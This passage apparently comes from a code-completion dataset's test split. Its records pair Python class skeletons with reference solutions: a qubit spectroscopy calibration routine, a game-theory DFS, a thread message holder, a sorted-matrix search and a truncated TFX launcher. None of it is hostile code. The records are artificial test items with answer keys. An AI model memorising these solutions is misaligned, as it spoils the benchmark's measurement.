voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\n\nMethod signatures and docstrings:\n- def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw): Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. 
In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\n- def create_routine_template(self): Creates routine template.\n- def post_run(self): Save the results of the routine.\n\n<|skeleton|>\nclass ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. 
fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n <|body_1|>\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n<|end_body_1|>\n\n<|body_start_2|>\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n<|end_body_2|>\n", "revision_id": "bc6733d774fe31a23f4c7e73e5eb0beed8d30e7d", "skeleton": "<|skeleton|>\nclass ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. 
In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n <|body_1|>\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. 
fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n", "source": "the_stack_v2_python_sparse", "source_path": "pycqed/measurement/calibration/automatic_calibration_routines/park_and_qubit_spectroscopy.py", "source_repo": "QudevETH/PycQED_py3", "split": "test", "star_events_count": 8} {"blob_id": "ae3c32b93921c5df08d556c4b36f8d4678ca8993", "bodies": ["self.max_num = maxChoosableInteger\nif (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\nif maxChoosableInteger >= desiredTotal:\n return True\nself.d = dict()\nreturn self.dfs(desiredTotal, 0)", "if total <= 0:\n return False\nif choose in self.d:\n return self.d[choose]\nfor i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total - i, next_choose):\n self.d[choose] = True\n return True\nself.d[choose] = False\nreturn False"], "bodies_text": "<|body_start_0|>\n self.max_num = maxChoosableInteger\n if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\n if maxChoosableInteger >= desiredTotal:\n return True\n self.d = dict()\n return self.dfs(desiredTotal, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n if total <= 0:\n return False\n if choose in self.d:\n return self.d[choose]\n for i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total 
- i, next_choose):\n                self.d[choose] = True\n                return True\n        self.d[choose] = False\n        return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def canIWin(self, maxChoosableInteger, desiredTotal):\n        \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n        <|body_0|>\n\n    def dfs(self, total, choose):\n        \"\"\"Depth-first search :type total: int :type choose: int\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        self.max_num = maxChoosableInteger\n        if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n            return False\n        if maxChoosableInteger >= desiredTotal:\n            return True\n        self.d = dict()\n        return self.dfs(desiredTotal, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n        if total <= 0:\n            return False\n        if choose in self.d:\n            return self.d[choose]\n        for i in range(1, self.max_num + 1):\n            if choose ^ 1 << i < choose:\n                continue\n            next_choose = choose | 1 << i\n            if not self.dfs(total - i, next_choose):\n                self.d[choose] = True\n                return True\n        self.d[choose] = False\n        return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000073", "length_bytes": 4497, "license_type": "no_license", "methods": [{"docstring": ":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool", "name": "canIWin", "signature": "def canIWin(self, maxChoosableInteger, desiredTotal)"}, {"docstring": "Depth-first search :type total: int :type choose: int", "name": "dfs", "signature": "def dfs(self, total, choose)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canIWin(self, maxChoosableInteger, desiredTotal): :type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\n- def dfs(self, total, choose): Depth-first search :type total: int :type choose: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canIWin(self, maxChoosableInteger, desiredTotal): :type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\n- def dfs(self, total, choose): Depth-first search :type total: int :type choose: int\n\n<|skeleton|>\nclass Solution:\n\n    def canIWin(self, maxChoosableInteger, desiredTotal):\n        \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n        <|body_0|>\n\n    def dfs(self, total, choose):\n        \"\"\"Depth-first search :type total: int :type choose: int\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        self.max_num = maxChoosableInteger\n        if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n            return False\n        if maxChoosableInteger >= desiredTotal:\n            return True\n        self.d = dict()\n        return self.dfs(desiredTotal, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n        if total <= 0:\n            return False\n        if choose in self.d:\n            return self.d[choose]\n        for i in range(1, self.max_num + 1):\n            if choose ^ 1 << i < choose:\n                continue\n            next_choose = choose | 1 << i\n            if not self.dfs(total - i, next_choose):\n                self.d[choose] = True\n                return True\n        self.d[choose] = False\n        return False\n<|end_body_1|>\n", "revision_id": "f832227c4d0e0b1c0cc326561187004ef24e2a68", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def canIWin(self, maxChoosableInteger, desiredTotal):\n        \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n        
<|body_0|>\n\n    def dfs(self, total, choose):\n        \"\"\"Depth-first search :type total: int :type choose: int\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def canIWin(self, maxChoosableInteger, desiredTotal):\n        \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n        self.max_num = maxChoosableInteger\n        if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n            return False\n        if maxChoosableInteger >= desiredTotal:\n            return True\n        self.d = dict()\n        return self.dfs(desiredTotal, 0)\n\n    def dfs(self, total, choose):\n        \"\"\"Depth-first search :type total: int :type choose: int\"\"\"\n        if total <= 0:\n            return False\n        if choose in self.d:\n            return self.d[choose]\n        for i in range(1, self.max_num + 1):\n            if choose ^ 1 << i < choose:\n                continue\n            next_choose = choose | 1 << i\n            if not self.dfs(total - i, next_choose):\n                self.d[choose] = True\n                return True\n        self.d[choose] = False\n        return False\n", "source": "the_stack_v2_python_sparse", "source_path": "464.py", "source_repo": "Gackle/leetcode_practice", "split": "test", "star_events_count": 0} {"blob_id": "5d5cb8e6f60ffb6771aa1745b38aad782f530a31", "bodies": ["object.__init__(self)\nself.stateLock = threading.Condition() if lock is None else lock\nself.msg = msg", "self.stateLock.acquire()\ntry:\n    self.msg = msg\nfinally:\n    self.stateLock.notify()\n    self.stateLock.release()", "self.stateLock.acquire()\nwhile self.msg is None:\n    self.stateLock.wait(timeOut)\nmsg = self.msg\nself.msg = None\nself.stateLock.release()\nreturn msg"], "bodies_text": "<|body_start_0|>\n        object.__init__(self)\n        self.stateLock = threading.Condition() if lock is None else lock\n        self.msg = msg\n<|end_body_0|>\n\n<|body_start_1|>\n        self.stateLock.acquire()\n        try:\n            self.msg = msg\n        finally:\n            self.stateLock.notify()\n            self.stateLock.release()\n<|end_body_1|>\n\n<|body_start_2|>\n        self.stateLock.acquire()\n        while self.msg is None:\n            self.stateLock.wait(timeOut)\n        msg = self.msg\n        self.msg = None\n        self.stateLock.release()\n        return msg\n<|end_body_2|>\n", "class_docstring": "Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.", "class_name": "LatestMessage", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LatestMessage:\n    \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n    def __init__(self, msg=None, lock=None):\n        \"\"\"'msg' is an initial value. 
'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n <|body_0|>\n\n def setMsg(self, msg):\n \"\"\"place the message and ensure the worker thread is notified is waiting\"\"\"\n <|body_1|>\n\n def getMsg(self, timeOut=None):\n \"\"\"get the latest message else wait for one\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__init__(self)\n self.stateLock = threading.Condition() if lock is None else lock\n self.msg = msg\n<|end_body_0|>\n\n<|body_start_1|>\n self.stateLock.acquire()\n try:\n self.msg = msg\n finally:\n self.stateLock.notify()\n self.stateLock.release()\n<|end_body_1|>\n\n<|body_start_2|>\n self.stateLock.acquire()\n while self.msg is None:\n self.stateLock.wait(timeOut)\n msg = self.msg\n self.msg = None\n self.stateLock.release()\n return msg\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000074", "length_bytes": 4351, "license_type": "no_license", "methods": [{"docstring": "'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.", "name": "__init__", "signature": "def __init__(self, msg=None, lock=None)"}, {"docstring": "place the message and ensure the worker thread is notified is waiting", "name": "setMsg", "signature": "def setMsg(self, msg)"}, {"docstring": "get the latest message else wait for one", "name": "getMsg", "signature": "def getMsg(self, timeOut=None)"}], "n_methods": 3, "prompt": "Implement the Python class `LatestMessage` described below.\n\nClass description:\nUsed when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\n\nMethod signatures and docstrings:\n- def __init__(self, msg=None, lock=None): 'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\n- def setMsg(self, msg): place the message and ensure the worker thread is notified is waiting\n- def getMsg(self, timeOut=None): get the latest message else wait for one", "prompted_full_text": "Implement the Python class `LatestMessage` described below.\n\nClass description:\nUsed when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\n\nMethod signatures and docstrings:\n- def __init__(self, msg=None, lock=None): 'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\n- def setMsg(self, msg): place the message and ensure the worker thread is notified is waiting\n- def getMsg(self, timeOut=None): get the latest message else wait for one\n\n<|skeleton|>\nclass LatestMessage:\n \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n def __init__(self, msg=None, lock=None):\n \"\"\"'msg' is an initial value. 
'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n        <|body_0|>\n\n    def setMsg(self, msg):\n        \"\"\"place the message and ensure the worker thread is notified if waiting\"\"\"\n        <|body_1|>\n\n    def getMsg(self, timeOut=None):\n        \"\"\"get the latest message else wait for one\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    object.__init__(self)\n    self.stateLock = threading.Condition() if lock is None else lock\n    self.msg = msg\n<|end_body_0|>\n\n<|body_start_1|>\n    self.stateLock.acquire()\n    try:\n        self.msg = msg\n    finally:\n        self.stateLock.notify()\n        self.stateLock.release()\n<|end_body_1|>\n\n<|body_start_2|>\n    self.stateLock.acquire()\n    while self.msg is None:\n        self.stateLock.wait(timeOut)\n    msg = self.msg\n    self.msg = None\n    self.stateLock.release()\n    return msg\n<|end_body_2|>\n", "revision_id": "b54f23c6c5f1f19e426ee06c9e9faf9f561ee9a9", "skeleton": "<|skeleton|>\nclass LatestMessage:\n    \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n    def __init__(self, msg=None, lock=None):\n        \"\"\"'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n        <|body_0|>\n\n    def setMsg(self, msg):\n        \"\"\"place the message and ensure the worker thread is notified if waiting\"\"\"\n        <|body_1|>\n\n    def getMsg(self, timeOut=None):\n        \"\"\"get the latest message else wait for one\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LatestMessage:\n    \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n    def __init__(self, msg=None, lock=None):\n        \"\"\"'msg' is an initial value. 
'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n        object.__init__(self)\n        self.stateLock = threading.Condition() if lock is None else lock\n        self.msg = msg\n\n    def setMsg(self, msg):\n        \"\"\"place the message and ensure the worker thread is notified if waiting\"\"\"\n        self.stateLock.acquire()\n        try:\n            self.msg = msg\n        finally:\n            self.stateLock.notify()\n            self.stateLock.release()\n\n    def getMsg(self, timeOut=None):\n        \"\"\"get the latest message else wait for one\"\"\"\n        self.stateLock.acquire()\n        while self.msg is None:\n            self.stateLock.wait(timeOut)\n        msg = self.msg\n        self.msg = None\n        self.stateLock.release()\n        return msg\n", "source": "the_stack_v2_python_sparse", "source_path": "pylib/thread.py", "source_repo": "chyser/bin", "split": "test", "star_events_count": 1} {"blob_id": "fb1200c85ac9ab4177dbb59360d3939337dfb76d", "bodies": ["row_num = len(array)\nfor i in range(row_num):\n    col_num = len(array[i])\n    for j in range(col_num):\n        if array[i][j] == target:\n            return True\nreturn False", "row_num = 0\ncol_num = len(array[0]) - 1\nrow_count = len(array)\nwhile row_num < row_count and col_num >= 0:\n    val = array[row_num][col_num]\n    if val == target:\n        return True\n    elif val > target:\n        col_num -= 1\n    else:\n        row_num += 1\nreturn False"], "bodies_text": "<|body_start_0|>\n    row_num = len(array)\n    for i in range(row_num):\n        col_num = len(array[i])\n        for j in range(col_num):\n            if array[i][j] == target:\n                return True\n    return False\n<|end_body_0|>\n\n<|body_start_1|>\n    row_num = 0\n    col_num = len(array[0]) - 1\n    row_count = len(array)\n    while row_num < row_count and col_num >= 0:\n        val = array[row_num][col_num]\n        if val == target:\n            return True\n        elif val > target:\n            col_num -= 1\n        else:\n            row_num += 1\n    return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def Find_1(self, target, array):\n        \"\"\"Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom\"\"\"\n        <|body_0|>\n\n    def Find_2(self, target, array):\n        \"\"\"Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    row_num = len(array)\n    for i in range(row_num):\n        col_num = len(array[i])\n        for j in range(col_num):\n            if array[i][j] == target:\n                return True\n    return False\n<|end_body_0|>\n\n<|body_start_1|>\n    row_num = 0\n    col_num = len(array[0]) - 1\n    row_count = len(array)\n    while row_num < row_count and col_num >= 0:\n        val = array[row_num][col_num]\n        if val == target:\n            return True\n        elif val > target:\n            col_num -= 1\n        else:\n            row_num += 1\n    return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000075", "length_bytes": 1457, "license_type": "no_license", "methods": [{"docstring": "Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom", "name": "Find_1", "signature": "def Find_1(self, target, array)"}, {"docstring": "Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)", "name": "Find_2", "signature": "def Find_2(self, target, array)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006044", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def Find_1(self, target, array): Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom\n- def Find_2(self, target, array): Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)", 
"prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def Find_1(self, target, array): Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom\n- def Find_2(self, target, array): Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)\n\n<|skeleton|>\nclass Solution:\n\n    def Find_1(self, target, array):\n        \"\"\"Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom\"\"\"\n        <|body_0|>\n\n    def Find_2(self, target, array):\n        \"\"\"Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    row_num = len(array)\n    for i in range(row_num):\n        col_num = len(array[i])\n        for j in range(col_num):\n            if array[i][j] == target:\n                return True\n    return False\n<|end_body_0|>\n\n<|body_start_1|>\n    row_num = 0\n    col_num = len(array[0]) - 1\n    row_count = len(array)\n    while row_num < row_count and col_num >= 0:\n        val = array[row_num][col_num]\n        if val == target:\n            return True\n        elif val > target:\n            col_num -= 1\n        else:\n            row_num += 1\n    return False\n<|end_body_1|>\n", "revision_id": "6ee455019ae2d9adeea9fc3876f5da4297320715", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def Find_1(self, target, array):\n        \"\"\"Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom\"\"\"\n        <|body_0|>\n\n    def Find_2(self, target, array):\n        \"\"\"Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def Find_1(self, target, array):\n        \"\"\"Method 1: scan the whole 2D array in the usual way. Time complexity is O(n*m) (rows * columns), i.e. O(n^2); this does not use the property that each row increases from left to right and each column increases from top to bottom\"\"\"\n        row_num = len(array)\n        for i in range(row_num):\n            col_num = len(array[i])\n            for j in range(col_num):\n                if array[i][j] == target:\n                    return True\n        return False\n\n    def Find_2(self, target, array):\n        \"\"\"Method 2: use the property that each row increases from left to right and each column increases from top to bottom to reduce the number of scans and comparisons. Time complexity is O(n)\"\"\"\n        row_num = 0\n        col_num = len(array[0]) - 1\n        row_count = len(array)\n        while row_num < row_count and col_num >= 0:\n            val = array[row_num][col_num]\n            if val == target:\n                return True\n            elif val > target:\n                col_num -= 1\n            else:\n                row_num += 1\n        return False\n", "source": "the_stack_v2_python_sparse", "source_path": "p1_array/a1_Find.py", "source_repo": "atm1992/nowcoder_offer_in_Python27", "split": "test", "star_events_count": 0} {"blob_id": "f5b546f2a15477fab799579cc7dd514f283b001d", "bodies": ["if component_config:\n    return False\nreturn isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)", "executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\nif issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n    executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\nelse:\n    executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\nexecutor = executor_class_spec.executor_class(executor_context)\nexecutor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))"], "bodies_text": "<|body_start_0|>\n    if component_config:\n        return False\n    return isinstance(component_executor_spec, 
